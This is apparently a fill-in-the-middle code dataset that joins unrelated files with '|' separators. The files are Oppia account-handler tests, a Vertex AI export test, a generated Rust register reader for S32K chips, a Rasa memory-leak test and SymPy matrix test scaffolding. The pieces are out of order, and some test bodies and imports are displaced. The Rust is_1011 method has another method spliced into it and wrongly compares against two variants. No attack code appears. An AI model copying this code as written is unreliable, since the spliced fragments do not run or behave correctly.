csrf_token = self.get_new_csrf_token()
# This user should have the learner dashboard as default.
self.post_json(
feconf.SIGNUP_DATA_URL,
{'agreed_to_terms': True, 'username': 'learneruser',
'default_dashboard': constants.DASHBOARD_TYPE_LEARNER,
'can_receive_email_updates': None},
csrf_token=csrf_token)
user_id = user_services.get_user_id_from_username('learneruser')
user_settings = user_services.get_user_settings(user_id)
self.assertEqual(
user_settings.default_dashboard, constants.DASHBOARD_TYPE_LEARNER)
self.logout()
def test_user_settings_of_non_existing_user(self):
self.login(self.OWNER_EMAIL)
values_dict = {
'can_send_emails': False,
'has_agreed_to_latest_terms': False,
'has_ever_registered': False,
'username': None,
}
response = self.get_json(feconf.SIGNUP_DATA_URL)
self.assertDictEqual(values_dict, response)
self.logout()
def test_user_settings_of_existing_user(self):
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.login(self.OWNER_EMAIL)
values_dict = {
'can_send_emails': True,
'has_agreed_to_latest_terms': True,
'has_ever_registered': True,
'username': 'owner',
}
with self.swap(feconf, 'CAN_SEND_EMAILS', True):
response = self.get_json(feconf.SIGNUP_DATA_URL)
self.assertDictEqual(values_dict, response)
self.logout()
class DeleteAccountPageTests(test_utils.GenericTestBase):
def setUp(self):
super(DeleteAccountPageTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
def test_get_delete_account_page(self):
with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', True):
response = self.get_html_response('/delete-account')
self.assertIn(
'<delete-account-page></delete-account-page>', response.body)
def test_get_delete_account_page_disabled(self):
with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', False):
self.get_html_response('/delete-account', expected_status_int=404)
class DeleteAccountHandlerTests(test_utils.GenericTestBase):
def setUp(self):
super(DeleteAccountHandlerTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
def test_delete_delete_account_page(self):
|
def test_delete_delete_account_page_disabled(self):
with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', False):
self.delete_json('/delete-account-handler', expected_status_int=404)
class ExportAccountHandlerTests(test_utils.GenericTestBase):
GENERIC_DATE = datetime.datetime(2019, 5, 20)
GENERIC_EPOCH = utils.get_time_in_millisecs(GENERIC_DATE)
def setUp(self):
super(ExportAccountHandlerTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
user_models.UserSubscriptionsModel(
id=self.get_user_id_from_email(self.EDITOR_EMAIL),
creator_ids=[],
collection_ids=[],
activity_ids=[],
general_feedback_thread_ids=[]).put()
def test_export_account_handler(self):
# Update user settings to constants.
user_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
user_settings = user_services.get_user_settings(user_id)
user_settings.last_agreed_to_terms = self.GENERIC_DATE
user_settings.last_logged_in = self.GENERIC_DATE
user_settings.validate()
user_models.UserSettingsModel(
id=user_settings.user_id,
gae_id=user_settings.gae_id,
email=user_settings.email,
role=user_settings.role,
username=user_settings.username,
normalized_username=user_settings.normalized_username,
last_agreed_to_terms=user_settings.last_agreed_to_terms,
last_started_state_editor_tutorial=(
user_settings.last_started_state_editor_tutorial),
last_started_state_translation_tutorial=(
user_settings.last_started_state_translation_tutorial),
last_logged_in=user_settings.last_logged_in,
last_edited_an_exploration=user_settings.last_edited_an_exploration,
last_created_an_exploration=(
user_settings.last_created_an_exploration),
profile_picture_data_url=user_settings.profile_picture_data_url,
default_dashboard=user_settings.default_dashboard,
creator_dashboard_display_pref=(
user_settings.creator_dashboard_display_pref),
user_bio=user_settings.user_bio,
subject_interests=user_settings.subject_interests,
first_contribution_msec=user_settings.first_contribution_msec,
preferred_language_codes=user_settings.preferred_language_codes,
preferred_site_language_code=(
user_settings.preferred_site_language_code),
preferred_audio_language_code=(
user_settings.preferred_audio_language_code),
deleted=user_settings.deleted
).put()
constants_swap = self.swap(constants, 'ENABLE_ACCOUNT_EXPORT', True)
time_swap = self.swap(
user_services, 'record_user_logged_in', lambda *args: None)
with constants_swap, time_swap:
data = self.get_json('/export-account-handler')
expected_data = {
u'topic_rights_data': {
u'managed_topic_ids': []
},
u'subtopic_page_snapshot_metadata_data': {},
u'general_voiceover_application_data': {},
u'collection_progress_data': {},
u'story_snapshot_metadata_data': {},
u'user_community_rights_data': {},
u'user_contributions_data': {
u'edited_exploration_ids': [],
u'created_exploration_ids': []
},
u'general_feedback_thread_user_data': {},
u'question_snapshot_metadata_data': {},
u'general_feedback_message_data': {},
u'story_progress_data': {},
u'learner_playlist_data': {},
u'collection_rights_data': {
u'voiced_collection_ids': [],
u'owned_collection_ids': [],
u'viewable_collection_ids': [],
u'editable_collection_ids': []
},
u'skill_snapshot_metadata_data': {},
u'exploration_user_data_data': {},
u'collection_snapshot_metadata_data': {},
u'exploration_rights_data': {
u'viewable_exploration_ids': [],
u'owned_exploration_ids': [],
u'voiced_exploration_ids': [],
u'editable_exploration_ids': []
},
u'topic_snapshot_metadata_data': {},
u'completed_activities_data': {},
u'general_feedback_thread_data': {},
u'topic_rights_snapshot_metadata_data': {},
u'user_stats_data': {},
u'exploration_rights_snapshot_metadata_data': {},
u'user_subscriptions_data': {
u'creator_usernames': [],
u'collection_ids': [],
u'activity_ids': [],
u'general_feedback_thread_ids': [],
u'last_checked': None
},
u'config_property_snapshot_metadata_data': {},
u'exploration_snapshot_metadata_data': {},
u'incomplete_activities_data': {},
u'user_skill_mastery_data': {},
u'exp_user_last_playthrough_data': {},
u'user_settings_data': {
u'username': u'editor',
u'last_agreed_to_terms': self.GENERIC_EPOCH,
u'last_started_state_translation_tutorial': None,
u'last_started_state_editor_tutorial': None,
u'normalized_username': u'editor',
u'first_contribution_msec': None,
u'preferred_language_codes': [
u'en'
],
u'creator_dashboard_display_pref': u'card',
u'subject_interests': [],
u'default_dashboard': None,
u'preferred_site_language_code': None,
u'user_bio': u'',
u'profile_picture_data_url':
user_services.DEFAULT_IDENTICON_DATA_URL,
u'role': u'EXPLORATION_EDITOR',
u'last_edited_an_exploration': None,
u'email': u'[email protected]',
u'preferred_audio_language_code': None,
u'last_logged_in': self.GENERIC_EPOCH
},
u'general_suggestion_data': {},
u'user_contribution_scoring_data': {},
u'general_feedback_email_reply_to_id_data': {},
u'collection_rights_snapshot_metadata_data': {}
}
self.assertEqual(
data,
expected_data
)
def test_export_account_handler_disabled_logged_in(self):
with self.swap(constants, 'ENABLE_ACCOUNT_EXPORT', False):
self.get_json('/export-account-handler', expected_status_int=404)
    def test_export_account_handler_disabled_logged_out(self):
self.logout()
with self.swap(constants, 'ENABLE_ACCOUNT_EXPORT', False):
self.get_json('/export-account-handler', expected_status_int=401)
def test_export_account_handler_enabled_logged_out(self):
self.logout()
with self.swap(constants, 'ENABLE_ACCOUNT_EXPORT', True):
self.get_json('/export-account-handler', expected_status_int=401)
class PendingAccountDeletionPageTests(test_utils.GenericTestBase):
def test_get_pending_account_deletion_page(self):
with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', True):
response = self.get_html_response('/pending-account-deletion')
self.assertIn('Pending Account Deletion', response.body)
def test_get_pending_account_deletion_page_disabled(self):
with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', False):
self.get_html_response('/pending-account-deletion',
expected_status_int=404)
class UsernameCheckHandlerTests(test_utils.GenericTestBase):
def test_username_check(self):
self.signup('[email protected]', username='abc')
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.USERNAME_CHECK_DATA_URL, {'username': 'abc'},
csrf_token=csrf_token)
self.assertEqual(
response_dict, {
'username_is_taken': True
})
response_dict = self.post_json(
feconf.USERNAME_CHECK_DATA_URL, {'username': 'def'},
csrf_token=csrf_token)
self.assertEqual(
response_dict, {
'username_is_taken': False
})
response_dict = self.post_json(
feconf.USERNAME_CHECK_DATA_URL, {'username': '!!!INVALID!!!'},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'can only have alphanumeric characters', response_dict['error'])
response_dict = self.post_json(
feconf.USERNAME_CHECK_DATA_URL,
{'username': self.UNICODE_TEST_STRING},
csrf_token=csrf_token, expected_status_int=400)
self.assertIn(
'can only have alphanumeric characters', response_dict['error'])
self.logout()
class SiteLanguageHandlerTests(test_utils.GenericTestBase):
def setUp(self):
super(SiteLanguageHandlerTests, self).setUp()
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
def test_save_site_language_handler(self):
"""Test the language is saved in the preferences when handler is
called.
"""
language_code = 'es'
self.login(self.EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/preferenceshandler/data', {
'update_type': 'preferred_site_language_code',
'data': language_code,
}, csrf_token=csrf_token)
preferences = self.get_json('/preferenceshandler/data')
self.assertIsNotNone(preferences)
self.assertEqual(
preferences['preferred_site_language_code'], language_code)
self.logout()
def test_can_update_site_language_code(self):
self.login(self.EDITOR_EMAIL)
user_settings = user_services.get_user_settings(
self.editor_id, strict=True)
self.assertIsNone(user_settings.preferred_site_language_code)
csrf_token = self.get_new_csrf_token()
self.put_json(
feconf.SITE_LANGUAGE_DATA_URL, payload={'site_language_code': 'en'},
csrf_token=csrf_token)
user_settings = user_services.get_user_settings(
self.editor_id, strict=True)
self.assertEqual(user_settings.preferred_site_language_code, 'en')
self.logout()
class UserInfoHandlerTests(test_utils.GenericTestBase):
def test_user_info_handler(self):
"""Test the language is saved in the preferences when handler is
called.
"""
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
json_response = self.get_json('/userinfohandler')
self.assertDictEqual({
'is_moderator': False,
'is_admin': False,
'is_topic_manager': False,
'is_super_admin': False,
'can_create_collections': False,
'preferred_site_language_code': None,
'username': self.EDITOR_USERNAME,
'email': self.EDITOR_EMAIL,
'user_is_logged_in': True}, json_response)
self.logout()
json_response = self.get_json('/userinfohandler')
self.assertDictEqual({
'user_is_logged_in': False
}, json_response)
class UrlHandlerTests(test_utils.GenericTestBase):
def test_login_url_is_none_for_signed_in_user(self):
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
response = self.get_json('/url_handler')
self.assertIsNone(response['login_url'])
self.logout()
def test_login_url_gets_created_for_signed_out_users(self):
response = self.get_json(
'/url_handler', params={'current_url': 'random_url'})
self.assertTrue(response['login_url'].endswith('random_url'))
| with self.swap(constants, 'ENABLE_ACCOUNT_DELETION', True):
data = self.delete_json('/delete-account-handler')
self.assertEqual(data, {'success': True}) |
export_model_tabular_classification_sample_test.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License. | from uuid import uuid4
import pytest
import export_model_tabular_classification_sample
PROJECT_ID = os.getenv("BUILD_SPECIFIC_GCLOUD_PROJECT")
MODEL_ID = "6036688272397172736" # iris 1000
GCS_BUCKET = "gs://ucaip-samples-test-output"
GCS_PREFIX = f"tmp/export_model_test_{uuid4()}"
@pytest.fixture(scope="function", autouse=True)
def teardown(storage_client):
yield
bucket = storage_client.get_bucket("ucaip-samples-test-output")
blobs = bucket.list_blobs(prefix=GCS_PREFIX)
for blob in blobs:
blob.delete()
def test_ucaip_generated_export_model_tabular_classification_sample(capsys):
export_model_tabular_classification_sample.export_model_tabular_classification_sample(
project=PROJECT_ID,
model_id=MODEL_ID,
gcs_destination_output_uri_prefix=f"{GCS_BUCKET}/{GCS_PREFIX}",
)
out, _ = capsys.readouterr()
assert "output_info" in out |
import os |
sdid.rs | #[doc = "Register `SDID` reader"]
pub struct R(crate::R<SDID_SPEC>);
impl core::ops::Deref for R {
type Target = crate::R<SDID_SPEC>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl From<crate::R<SDID_SPEC>> for R {
#[inline(always)]
fn from(reader: crate::R<SDID_SPEC>) -> Self {
R(reader)
}
}
#[doc = "Field `FEATURES` reader - Features"]
pub struct FEATURES_R(crate::FieldReader<u8, u8>);
impl FEATURES_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
FEATURES_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for FEATURES_R {
type Target = crate::FieldReader<u8, u8>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Package\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
#[repr(u8)]
pub enum PACKAGE_A {
#[doc = "2: 48 LQFP"]
_0010 = 2,
#[doc = "3: 64 LQFP"]
_0011 = 3,
#[doc = "4: 100 LQFP"]
_0100 = 4,
#[doc = "6: 144 LQFP"]
_0110 = 6,
#[doc = "7: 176 LQFP"]
_0111 = 7,
#[doc = "8: 100 MAP BGA"]
_1000 = 8,
}
impl From<PACKAGE_A> for u8 {
#[inline(always)]
fn from(variant: PACKAGE_A) -> Self {
variant as _
}
}
#[doc = "Field `PACKAGE` reader - Package"]
pub struct PACKAGE_R(crate::FieldReader<u8, PACKAGE_A>);
impl PACKAGE_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
PACKAGE_R(crate::FieldReader::new(bits))
}
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> Option<PACKAGE_A> {
match self.bits {
2 => Some(PACKAGE_A::_0010),
3 => Some(PACKAGE_A::_0011),
4 => Some(PACKAGE_A::_0100),
6 => Some(PACKAGE_A::_0110),
7 => Some(PACKAGE_A::_0111),
8 => Some(PACKAGE_A::_1000),
_ => None,
}
}
#[doc = "Checks if the value of the field is `_0010`"]
#[inline(always)]
pub fn is_0010(&self) -> bool {
**self == PACKAGE_A::_0010
}
#[doc = "Checks if the value of the field is `_0011`"]
#[inline(always)]
pub fn is_0011(&self) -> bool {
**self == PACKAGE_A::_0011
}
#[doc = "Checks if the value of the field is `_0100`"]
#[inline(always)]
pub fn is_0100(&self) -> bool {
**self == PACKAGE_A::_0100
}
#[doc = "Checks if the value of the field is `_0110`"]
#[inline(always)]
pub fn is_0110(&self) -> bool {
**self == PACKAGE_A::_0110
}
#[doc = "Checks if the value of the field is `_0111`"]
#[inline(always)]
pub fn is_0111(&self) -> bool {
**self == PACKAGE_A::_0111
}
#[doc = "Checks if the value of the field is `_1000`"]
#[inline(always)]
pub fn is_1000(&self) -> bool {
**self == PACKAGE_A::_1000
}
}
impl core::ops::Deref for PACKAGE_R {
type Target = crate::FieldReader<u8, PACKAGE_A>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `REVID` reader - Device revision number"]
pub struct REVID_R(crate::FieldReader<u8, u8>);
impl REVID_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
REVID_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for REVID_R {
type Target = crate::FieldReader<u8, u8>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "RAM size\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
#[repr(u8)]
pub enum RAMSIZE_A {
#[doc = "11: 192 KB (S32K148), 96 KB (S32K146), Reserved (others)"]
_1011 = 11,
#[doc = "13: 48 KB (S32K144), Reserved (others)"]
_1101 = 13,
#[doc = "15: 256 KB (S32K148), 128 KB (S32K146), 64 KB (S32K144), 32 KB (S32K142), 25 KB (S32K118), 17 KB (S32K116)"]
_1111 = 15,
}
impl From<RAMSIZE_A> for u8 {
#[inline(always)]
fn from(variant: RAMSIZE_A) -> Self {
variant as _
}
}
#[doc = "Field `RAMSIZE` reader - RAM size"]
pub struct RAMSIZE_R(crate::FieldReader<u8, RAMSIZE_A>);
impl RAMSIZE_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
RAMSIZE_R(crate::FieldReader::new(bits))
}
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> Option<RAMSIZE_A> {
match self.bits {
11 => Some(RAMSIZE_A::_1011),
13 => Some(RAMSIZE_A::_1101),
15 => Some(RAMSIZE_A::_1111),
_ => None,
}
}
#[doc = "Checks if the value of the field is `_1011`"]
#[inline(always)]
pub fn is_1011(&self) -> bool {
**self == RAMSIZE_A::_1011 | **self == RAMSIZE_A::_1101
}
#[doc = "Checks if the value of the field is `_1111`"]
#[inline(always)]
pub fn is_1111(&self) -> bool {
**self == RAMSIZE_A::_1111
}
}
impl core::ops::Deref for RAMSIZE_R {
type Target = crate::FieldReader<u8, RAMSIZE_A>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `DERIVATE` reader - Derivate"]
pub struct DERIVATE_R(crate::FieldReader<u8, u8>);
impl DERIVATE_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
DERIVATE_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for DERIVATE_R {
type Target = crate::FieldReader<u8, u8>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `SUBSERIES` reader - Subseries"]
pub struct SUBSERIES_R(crate::FieldReader<u8, u8>);
impl SUBSERIES_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
SUBSERIES_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for SUBSERIES_R {
type Target = crate::FieldReader<u8, u8>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
#[doc = "Field `GENERATION` reader - S32K product series generation"]
pub struct GENERATION_R(crate::FieldReader<u8, u8>);
impl GENERATION_R {
#[inline(always)]
pub(crate) fn new(bits: u8) -> Self {
GENERATION_R(crate::FieldReader::new(bits))
}
}
impl core::ops::Deref for GENERATION_R {
type Target = crate::FieldReader<u8, u8>;
#[inline(always)]
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl R {
#[doc = "Bits 0:7 - Features"]
#[inline(always)]
pub fn features(&self) -> FEATURES_R {
FEATURES_R::new((self.bits & 0xff) as u8)
}
#[doc = "Bits 8:11 - Package"]
#[inline(always)]
pub fn package(&self) -> PACKAGE_R {
PACKAGE_R::new(((self.bits >> 8) & 0x0f) as u8)
}
#[doc = "Bits 12:15 - Device revision number"]
#[inline(always)]
pub fn revid(&self) -> REVID_R {
REVID_R::new(((self.bits >> 12) & 0x0f) as u8)
}
#[doc = "Bits 16:19 - RAM size"]
#[inline(always)]
pub fn ramsize(&self) -> RAMSIZE_R {
RAMSIZE_R::new(((self.bits >> 16) & 0x0f) as u8)
}
#[doc = "Bits 20:23 - Derivate"]
#[inline(always)]
pub fn derivate(&self) -> DERIVATE_R {
DERIVATE_R::new(((self.bits >> 20) & 0x0f) as u8)
}
#[doc = "Bits 24:27 - Subseries"]
#[inline(always)]
pub fn subseries(&self) -> SUBSERIES_R {
SUBSERIES_R::new(((self.bits >> 24) & 0x0f) as u8)
}
#[doc = "Bits 28:31 - S32K product series generation"]
#[inline(always)]
pub fn generation(&self) -> GENERATION_R {
GENERATION_R::new(((self.bits >> 28) & 0x0f) as u8)
}
}
#[doc = "System Device Identification Register\n\nThis register you can [`read`](crate::generic::Reg::read). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [sdid](index.html) module"]
pub struct SDID_SPEC;
impl crate::RegisterSpec for SDID_SPEC {
type Ux = u32;
}
#[doc = "`read()` method returns [sdid::R](R) reader structure"]
impl crate::Readable for SDID_SPEC {
type Reader = R;
}
#[doc = "`reset()` method sets SDID to value 0"]
impl crate::Resettable for SDID_SPEC {
#[inline(always)]
fn reset_value() -> Self::Ux {
0
}
} | }
#[doc = "Checks if the value of the field is `_1101`"]
#[inline(always)]
pub fn is_1101(&self) -> bool { |
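# Illustrative sketch (an assumption, not part of the generated crate): the
# same SDID field extraction as the reader methods above, expressed as plain
# shift/mask arithmetic. Bit positions follow the documented layout
# (features 0:7, package 8:11, revid 12:15, ramsize 16:19, derivate 20:23,
# subseries 24:27, generation 28:31).
def decode_sdid(bits: int) -> dict:
    return {
        "features": bits & 0xFF,
        "package": (bits >> 8) & 0x0F,
        "revid": (bits >> 12) & 0x0F,
        "ramsize": (bits >> 16) & 0x0F,  # 15 => 256 KB on S32K148
        "derivate": (bits >> 20) & 0x0F,
        "subseries": (bits >> 24) & 0x0F,
        "generation": (bits >> 28) & 0x0F,
    }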
test_memory_leak.py | import abc
import json
import subprocess
import sys
import tempfile
import time
from pathlib import Path
from typing import Text, List, Tuple, Optional, Union
import memory_profiler
import psutil
import pytest
import rasa
import rasa.shared.utils.io
PROFILING_INTERVAL = 0.1
# Enable this to plot the results locally
WRITE_RESULTS_TO_DISK = False
def _custom_default_config(
tmp_path: Union[Path, Text], epochs: int, max_history: Optional[int] = -1
) -> Text:
# Override default config to use custom amount of epochs
default_config = Path("rasa", "shared", "importers", "default_config.yml")
config = rasa.shared.utils.io.read_yaml_file(default_config)
for model_part, items in config.items():
for item in items:
if "epochs" in item:
item["epochs"] = epochs
if "max_history" in item and max_history != -1:
item["max_history"] = None
config_for_test = Path(tmp_path) / "test_config.yml"
rasa.shared.utils.io.write_yaml(config, config_for_test)
return str(config_for_test)
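# Sketch of the config shape the loop above assumes (an illustration, not the
# shipped rasa default config): top-level sections map to lists of component
# dicts, some of which carry "epochs" / "max_history" entries.
_EXAMPLE_CONFIG_SHAPE = {
    "pipeline": [{"name": "DIETClassifier", "epochs": 100}],
    "policies": [{"name": "TEDPolicy", "epochs": 100, "max_history": 5}],
}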
class MemoryLeakTest(abc.ABC):
"""Generic template for memory leak tests."""
@property
def max_memory_threshold_mb(self) -> float:
return 1000
@pytest.fixture
@abc.abstractmethod
def name_for_dumped_files(self) -> Text:
raise NotImplementedError
@abc.abstractmethod
def function_to_profile(self) -> None:
raise NotImplementedError
@pytest.mark.timeout(720, func_only=True)
def test_for_memory_leak(
self, name_for_dumped_files: Text, tmp_path: Path,
) -> None:
# Run as separate process to avoid other things affecting the memory usage.
# Unfortunately `memory-profiler` doesn't work properly with
# `multiprocessing.Process` as it can't handle the process exit
process = subprocess.Popen(
[
sys.executable,
"-c",
(
f"from {__name__} import {self.__class__.__name__}; "
f"t = {self.__class__.__name__}();"
f"t.function_to_profile()"
),
],
# Force TensorFlow to use CPU so we can track the memory usage
env={"CUDA_VISIBLE_DEVICES": "-1"},
)
# Wait until process is running to avoid race conditions with the memory
# profiling
while not psutil.pid_exists(process.pid):
time.sleep(0.01)
results = memory_profiler.memory_usage(
process,
interval=PROFILING_INTERVAL,
include_children=True,
timestamps=True,
)
# `memory-profiler` sometimes adds `None` values at the end which we don't need
results = [
memory_timestamp
for memory_timestamp in results
if memory_timestamp is not None
]
if WRITE_RESULTS_TO_DISK:
self._write_results(name_for_dumped_files, results)
max_memory_usage = max(results, key=lambda memory_time: memory_time[0])[0]
assert max_memory_usage < self.max_memory_threshold_mb
@staticmethod
    def _write_results(base_name: Text, results: List[Tuple[float, float]]) -> None:
mprof_plot = Path(f"{base_name}_plot.txt")
mprof_results = Path(f"{base_name}_raw.json")
# plot this via `mprof plot mprof_result.txt`
with open(mprof_plot, "w") as f:
for memory, timestamp in results:
f.write(f"MEM {memory:.6f} {timestamp:.4f}\n")
        # dump results as json to be able to analyze them without re-running the test
with open(mprof_results, "w") as f:
f.write(json.dumps(results))
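# Hypothetical helper (an assumption, not part of this module): reload the raw
# JSON dumped by _write_results and recompute the peak memory, e.g. to analyze
# a run offline without re-profiling.
def _peak_memory_mb(raw_results_path: Text) -> float:
    with open(raw_results_path) as f:
        results = json.load(f)  # list of [memory_mb, timestamp] pairs
    return max(memory for memory, _ in results)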
class TestNLULeakManyEpochs(MemoryLeakTest):
"""Tests for memory leaks in NLU components when training with many epochs."""
@property
def epochs(self) -> int:
return 30
@property
def max_memory_threshold_mb(self) -> float:
return 2200
def function_to_profile(self) -> None:
import rasa.model_training
with tempfile.TemporaryDirectory() as temp_dir:
rasa.model_training.train_nlu(
_custom_default_config(temp_dir, epochs=self.epochs),
Path("data", "test_nlu_no_responses", "sara_nlu_data.yml"),
output=temp_dir,
)
@pytest.fixture()
def name_for_dumped_files(self) -> Text:
return (
f"memory_usage_rasa_nlu_{rasa.__version__}_"
f"epochs{self.epochs}_training_runs1"
)
class TestCoreLeakManyEpochs(MemoryLeakTest):
"""Tests for memory leaks in Core policies when training with many epochs."""
@property
def epochs(self) -> int:
return 200
@property
def max_memory_threshold_mb(self) -> float:
return 2000
def function_to_profile(self) -> None:
import rasa.model_training
with tempfile.TemporaryDirectory() as temp_dir:
rasa.model_training.train_core(
"data/test_domains/default_with_slots.yml",
_custom_default_config(temp_dir, epochs=self.epochs, max_history=None),
"data/test_yaml_stories/stories_defaultdomain.yml",
output=temp_dir,
additional_arguments={"augmentation_factor": 20},
)
@pytest.fixture()
def name_for_dumped_files(self) -> Text:
return (
f"memory_usage_rasa_core_{rasa.__version__}_"
f"epochs{self.epochs}_training_runs1"
)
class TestCRFDenseFeaturesLeak(MemoryLeakTest):
"""Tests for memory leaks in NLU the CRF when using dense features."""
@property
def epochs(self) -> int:
return 1
@property
def max_memory_threshold_mb(self) -> float:
return 1600
def function_to_profile(self) -> None:
import rasa.model_training
config = {
"pipeline": [
{"name": "SpacyNLP"},
{"name": "SpacyTokenizer"},
{"name": "SpacyFeaturizer"},
{
"name": "CRFEntityExtractor",
"features": [
["pos", "pos2"],
[
"bias",
"prefix5",
"prefix2",
"suffix5",
"suffix3",
"suffix2",
"pos",
"pos2",
"digit",
"text_dense_features",
],
["pos", "pos2"],
],
},
]
}
with tempfile.TemporaryDirectory() as temp_dir:
config_for_test = Path(temp_dir) / "test_config.yml"
rasa.shared.utils.io.write_yaml(config, config_for_test)
rasa.model_training.train_nlu(
str(config_for_test),
str(Path("data", "test_nlu_no_responses", "sara_nlu_data.yml")),
output=temp_dir,
)
@pytest.fixture()
def name_for_dumped_files(self) -> Text:
| return f"memory_usage_rasa_nlu_crf_dense_{rasa.__version__}_" |
|
test_commonmatrix.py | import collections
import random
from sympy.assumptions import Q
from sympy.core.add import Add
from sympy.core.compatibility import range
from sympy.core.function import (Function, diff)
from sympy.core.numbers import (E, Float, I, Integer, oo, pi)
from sympy.core.relational import (Eq, Lt)
from sympy.core.singleton import S
from sympy.core.symbol import (Symbol, symbols)
from sympy.functions.elementary.complexes import Abs
from sympy.functions.elementary.exponential import exp
from sympy.functions.elementary.miscellaneous import (Max, Min, sqrt)
from sympy.functions.elementary.piecewise import Piecewise
from sympy.functions.elementary.trigonometric import (cos, sin, tan)
from sympy.logic.boolalg import (And, Or)
from sympy.matrices.common import (ShapeError, MatrixError, NonSquareMatrixError,
_MinimalMatrix, MatrixShaping, MatrixProperties, MatrixOperations, MatrixArithmetic,
MatrixSpecial)
from sympy.matrices.matrices import (MatrixDeterminant,
MatrixReductions, MatrixSubspaces, MatrixEigen, MatrixCalculus)
from sympy.matrices import (Matrix, diag, eye,
matrix_multiply_elementwise, ones, zeros, SparseMatrix)
from sympy.polys.polytools import Poly
from sympy.simplify.simplify import simplify
from sympy.simplify.trigsimp import trigsimp
from sympy.utilities.exceptions import SymPyDeprecationWarning
from sympy.utilities.iterables import flatten
from sympy.utilities.pytest import (raises, XFAIL, slow, skip,
warns_deprecated_sympy)
from sympy.abc import a, b, c, d, x, y, z
# classes to test the basic matrix classes
class ShapingOnlyMatrix(_MinimalMatrix, MatrixShaping):
pass
def eye_Shaping(n):
return ShapingOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Shaping(n):
return ShapingOnlyMatrix(n, n, lambda i, j: 0)
class PropertiesOnlyMatrix(_MinimalMatrix, MatrixProperties):
pass
def eye_Properties(n):
return PropertiesOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Properties(n):
return PropertiesOnlyMatrix(n, n, lambda i, j: 0)
class OperationsOnlyMatrix(_MinimalMatrix, MatrixOperations):
pass
def eye_Operations(n):
return OperationsOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Operations(n):
return OperationsOnlyMatrix(n, n, lambda i, j: 0)
class ArithmeticOnlyMatrix(_MinimalMatrix, MatrixArithmetic):
pass
def eye_Arithmetic(n):
return ArithmeticOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Arithmetic(n):
return ArithmeticOnlyMatrix(n, n, lambda i, j: 0)
class DeterminantOnlyMatrix(_MinimalMatrix, MatrixDeterminant):
pass
def eye_Determinant(n):
return DeterminantOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Determinant(n):
return DeterminantOnlyMatrix(n, n, lambda i, j: 0)
class ReductionsOnlyMatrix(_MinimalMatrix, MatrixReductions):
pass
def eye_Reductions(n):
return ReductionsOnlyMatrix(n, n, lambda i, j: int(i == j))
def zeros_Reductions(n):
return ReductionsOnlyMatrix(n, n, lambda i, j: 0)
class SpecialOnlyMatrix(_MinimalMatrix, MatrixSpecial):
pass
class SubspaceOnlyMatrix(_MinimalMatrix, MatrixSubspaces):
pass
class EigenOnlyMatrix(_MinimalMatrix, MatrixEigen):
pass
class CalculusOnlyMatrix(_MinimalMatrix, MatrixCalculus):
pass
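# Sketch of the capability-isolation idea behind the *OnlyMatrix classes above
# (a hypothetical helper, not one of the tests): each class grafts exactly one
# mixin onto _MinimalMatrix, so a passing test proves the capability needs
# nothing beyond minimal storage.
def _demo_capability_isolation():
    m = ShapingOnlyMatrix(2, 2, [1, 2, 3, 4])
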